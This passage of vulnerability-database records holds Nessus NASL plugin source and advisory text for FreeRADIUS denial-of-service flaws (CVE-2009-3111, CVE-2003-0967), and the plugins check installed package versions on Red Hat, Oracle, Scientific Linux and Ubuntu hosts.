value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T12:44:43", "description": "From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : freeradius (ELSA-2009-1451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:freeradius-postgresql", "p-cpe:/a:oracle:linux:freeradius", "p-cpe:/a:oracle:linux:freeradius-unixODBC", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:freeradius-mysql"], "id": "ORACLELINUX_ELSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/nessus/67926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# Oracle Linux Security Advisory ELSA-2009-1451 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67926);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"Oracle Linux 5 : freeradius (ELSA-2009-1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-September/001156.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:44:31", "description": "CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes\nwith zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : freeradius on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090917_FREERADIUS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60666);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n\n script_name(english:\"Scientific Linux Security Update : freeradius on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes\nwith zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0909&L=scientific-linux-errata&T=0&P=1083\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab89ee37\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated FreeRADIUS packages are now available that fix a denial of\nservice vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to\nperform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS\nstring attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password\nattribute. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "edition": 27, "published": "2004-07-06T00:00:00", "title": "RHEL 3 : freeradius (RHSA-2003:386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:freeradius"], "id": "REDHAT-RHSA-2003-386.NASL", "href": "https://www.tenable.com/plugins/nessus/12437", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:386. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12437);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\");\n script_xref(name:\"RHSA\", value:\"2003:386\");\n\n script_name(english:\"RHEL 3 : freeradius (RHSA-2003:386)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated FreeRADIUS packages are now available that fix a denial of\nservice vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to\nperform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS\nstring attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password\nattribute. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0967\"\n );\n # http://marc.theaimsgroup.com/?l=freeradius-users&m=106947389449613\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=freeradius-users&m=106947389449613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:386\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:386\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"freeradius-0.9.3-1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T06:57:09", "description": "It was discovered that FreeRADIUS did not correctly handle certain\nmalformed attributes. A remote attacker could exploit this flaw and\ncause the FreeRADIUS server to crash, resulting in a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-09-17T00:00:00", "title": "Ubuntu 8.04 LTS : freeradius vulnerability (USN-832-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:freeradius-dialupadmin", "p-cpe:/a:canonical:ubuntu_linux:freeradius-dbg", "p-cpe:/a:canonical:ubuntu_linux:freeradius-iodbc", "p-cpe:/a:canonical:ubuntu_linux:freeradius", "p-cpe:/a:canonical:ubuntu_linux:freeradius-ldap", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:freeradius-postgresql", "p-cpe:/a:canonical:ubuntu_linux:freeradius-mysql", "p-cpe:/a:canonical:ubuntu_linux:freeradius-krb5"], "id": "UBUNTU_USN-832-1.NASL", "href": "https://www.tenable.com/plugins/nessus/41006", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-832-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41006);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"USN\", value:\"832-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS : freeradius vulnerability (USN-832-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that FreeRADIUS did not correctly handle certain\nmalformed attributes. A remote attacker could exploit this flaw and\ncause the FreeRADIUS server to crash, resulting in a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/832-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-dialupadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-iodbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-dbg\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-dialupadmin\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-iodbc\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-krb5\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"freeradius-ldap\", pkgver:\"1.1.7-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", 